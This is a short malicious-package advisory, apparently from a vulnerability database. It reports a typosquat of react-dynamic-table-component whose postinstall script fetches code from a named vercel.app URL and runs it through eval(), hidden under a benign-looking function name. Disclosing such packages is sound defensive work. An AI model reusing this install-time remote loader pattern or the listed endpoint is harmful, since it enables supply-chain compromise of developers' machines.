MAL-2026-6533

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (c55ead8b66faca1e08b2babafa252da2371b535c010a5c14d8b0d0e2a44aadf8) Package name misspells 'component' as 'compenent', a one-letter typosquat of react-dynamic-table-component. The package's postinstall script runs `node dist/setup.js`, which fetches https://everydaynodechecker-39143n.vercel.app/api/key?mem=master and passes the response body directly to eval(), inside a function misleadingly named initDatabase. The fetched content is attacker-controlled and mutable, so any default `npm install` of this package executes whatever code the endpoint currently serves on the installer's machine. The cover-story naming (initDatabase, key?mem=master) presents the request as benign configuration while it is a remote code loader.